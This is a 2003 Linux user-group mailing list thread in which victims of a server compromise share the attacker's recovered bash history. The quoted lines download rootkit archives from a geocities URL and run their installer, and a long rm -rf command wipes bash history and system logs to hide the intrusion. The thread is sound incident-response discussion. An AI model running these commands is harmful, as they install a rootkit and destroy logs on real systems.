was i hacked

[Ryan Ekins]

I was going through my files and found the text I had copied from my bash
history file when a hacker had compromised my system. I thought I'd add it
to the thread for fun.

wget www.geocities.com/iuli4n/Ci.tgz
tar xvzf Ci.tgz
rm -rf Ci.tgz
cd rk
./install
wget www.geocities.com/iuli4n/UsE.tgz
cd ..
dir -a
wget www.geocities.com/iuli4n/UsE.tgz
tar vxzf Use.tgz
cd rk
./install

I emailed geocities and told them about the user, but they haven't disabled
his account yet.

-Ryan

----- Original Message -----
From: "Uday" <uday at accord.co.in>
To: <pluglist at plug.org>
Sent: Sunday, May 04, 2003 10:11 PM
Subject: Re: was i hacked


> Thanx for all that help & experiences from you guys.  It gave me a big
boost
> as whole of the incident was getting on my nerves.
>
> I am planning to wipe off the stuff obiviously after taking backup and
> reload with RH9.0 the latest I suppose it must have all the patches as
> Robert suggested.
>
> And as Ryan stated:
> > I had the same thing happen, only they had left the bash history file,
so
> I
> > could see what they did. They had run a root kit program. I did some
> > research and the only thing that I could really do was take my server
off
> > line, save home and local directories and re-install.
>
> In this case also he/they has left the bash history file behind but I
could
> not really be a Sherlock Homes : ) Anyway following were the command which
I
> think were alien:
>
> netstat -an | grep 139
> w
> rm -rf /var/adm/lastlog /root/.bash* /.bash* /root/.bash_history
> /.bash_history /tmp/* /tmp/.bash_
> * /var/log/* /etc/log /tmp/log/* /var/log/* /tmp/var/log/* /usr/log/*
> /usr/adm/log/*
> w
> exit
>
> Anyone who can derive some conclusion out of this is welcomed or any
further
> security needed.
>
> Thanx
> -Uday
>
>
>
> .===================================.
> | This has been a P.L.U.G. mailing. |
> |      Don't Fear the Penguin.      |
> `==================================='